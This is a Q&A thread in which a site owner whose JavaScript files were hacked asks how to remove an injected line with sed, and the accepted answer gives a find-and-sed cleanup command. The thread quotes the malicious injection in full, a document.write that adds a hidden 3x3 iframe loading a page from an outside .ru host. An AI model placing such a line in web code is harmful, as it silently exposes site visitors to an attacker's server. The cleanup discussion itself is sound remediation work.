# Using sed to delete string

Tags: sed

I was hacked and have hundreds of .js files with this line of code that I'm trying to get rid of:

```
;document.write('<iframe src="http://sitecorporatemanagement.ru/pretzellogmeins.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>');
```

It is the last line of the file, but I think the file contains windows line endings, because when ever I do this:

```
sed -i '/sitecorporatemanagement.ru/d' *
```

it deletes the full content of the file. Can you help me get this to work? I just need that full string deleted.

Thank you for all the help you can give.

Comment: You can often switch the newline characters with the `dos2unix` command.

Comment: Can't you go back to your site from source control and rebuild it from the original code?

Comment: You can delete the last line of a file with `sed -i '$d' $file`.  Windows style newlines shouldn't cause the problem; there is a LF at the end of the line.

Comment: For some reason that is still deleting the full contents of the file. When I view the file in Komodo Edit, it appears on its own line, but with 'less' the full file is on one line.

Comment: this gets asked 2-3 times a week, please learn to use the search facility `[sed] fix js hacked` might be all you need. Good luck.

Answer (score 1, accepted):

I ended up removing the offending code with the following, which worked.

```
find public_html/ -type f -name "*.js" -exec sed -i 's|;document.write(\x27<iframe src="http://sitecorporatemanagement.ru/pretzellogmeins.cgi?8" scrolling="auto" frameborder="no" align="center" height="3" width="3"></iframe>\x27);||g' {} \;
```